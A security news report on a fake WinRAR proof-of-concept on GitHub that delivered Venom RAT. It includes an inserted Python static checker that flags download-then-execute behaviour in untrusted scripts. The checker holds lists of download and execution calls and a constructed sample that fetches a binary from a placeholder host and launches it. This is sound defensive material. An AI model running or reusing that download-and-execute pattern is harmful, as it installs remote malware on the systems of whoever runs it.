A recent incident highlights a significant cybersecurity threat: a counterfeit proof-of-concept (PoC) exploit for a newly identified vulnerability in WinRAR. The exploit was shared on GitHub with the intent of infecting users who downloaded the code with Venom RAT malware. Researchers from Palo Alto Networks' Unit 42, including Robert Falcone, noted that this fake PoC was derived from an existing exploit script targeting a SQL injection vulnerability in GeoServer, identified as CVE-2023-25157.

As the cybersecurity landscape evolves, fraudulent PoCs have become increasingly common, posing risks to the research community and potentially targeting other malicious actors who may integrate recent vulnerabilities into their toolkits. This incident underscores the opportunistic nature of attackers in exploiting new vulnerabilities, with the recent WinRAR flaw, designated CVE-2023-40477, serving as an attractive target.

The hosting account for the malicious repository, attributed to a user named whalersplonk, was rendered inaccessible shortly after the PoC was committed on August 21, 2023, merely four days after the vulnerability was publicly revealed. The WinRAR issue stems from improper validation and can lead to remote code execution (RCE) on Windows systems. The vulnerability was addressed last month in WinRAR version 6.23, alongside another flaw, tracked as CVE-2023-38831, which was already under active exploitation.

Upon examining the malicious repository, cybersecurity analysts discovered both a Python script and a Streamable video tutorial on leveraging the exploit. Notably, the script did not execute the PoC but instead connected to a remote server to download an executable named Windows.Gaming.Preview.exe, a variant of Venom RAT. This executable facilitates various commands, including listing running processes and receiving instructions from a command and control server.
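The pattern described above, a "PoC" that never touches the vulnerable component but fetches and launches a binary, can be caught by static triage before anyone runs the script. The following Python checker is an added illustration, not code from the article or from Unit 42's analysis; the sample PoC, its placeholder URL and the lists of download and execution calls are constructed for the demonstration.

```python
# Static triage of an untrusted Python PoC using the standard `ast` module.
# Flags scripts that both fetch remote content and launch a program, the
# download-then-execute behaviour of the fake WinRAR PoC described above.
import ast

# Assumed call names (not exhaustive; aliased imports are not resolved).
DOWNLOAD_CALLS = {
    "urllib.request.urlretrieve", "urllib.request.urlopen",
    "requests.get", "requests.post", "wget.download",
}
EXEC_CALLS = {
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "os.system", "os.startfile", "os.popen",
}

def _dotted_name(node: ast.AST) -> str:
    """Rebuild 'pkg.mod.func' from a Name/Attribute chain, or '' if unresolvable."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""

def triage_poc(source: str) -> dict:
    """Report download and exec calls (name, line) and whether both appear."""
    found = {"download": [], "exec": []}
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name in DOWNLOAD_CALLS:
            found["download"].append((name, node.lineno))
        elif name in EXEC_CALLS:
            found["exec"].append((name, node.lineno))
    found["download_then_exec"] = bool(found["download"] and found["exec"])
    return found

# Constructed sample mimicking the fake PoC; the URL is a placeholder.
SAMPLE_POC = '''
import urllib.request, subprocess
urllib.request.urlretrieve("http://example.invalid/p", "Windows.Gaming.Preview.exe")
subprocess.Popen(["Windows.Gaming.Preview.exe"])
'''

if __name__ == "__main__":
    print(triage_poc(SAMPLE_POC))
```

A real PoC for a file-format bug would be expected to write a crafted archive, not to fetch and start an executable, so a hit on `download_then_exec` is a strong signal to sandbox the script rather than run it on a workstation.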

Further investigation into the attacker’s infrastructure indicated that the domain checkblacklistwords[.]eu was registered at least ten days before the vulnerability was publicly disclosed. This suggests a premeditated effort to exploit the urgency surrounding the bug, potentially attracting unsuspecting victims.

Falcone emphasized the grave implications of this deceptive PoC, noting its intent to compromise individuals soon after the vulnerability’s announcement. He pointed out that the scam exploited a well-known RCE vulnerability, highlighting how attackers may target a wide range of victims, including other malicious entities.

From a cybersecurity perspective, the tactics employed in this incident align with several phases of the MITRE ATT&CK framework. For initial access, the attacker likely relied on the high interest surrounding the vulnerability to lure unsuspecting users into running the fake PoC. Persistence could have been established through the deployed Venom RAT, which enables ongoing communication with its command and control server and remote command execution. These potential methodologies underscore the critical need for vigilance and preparedness among businesses to avoid similar threats in the future.
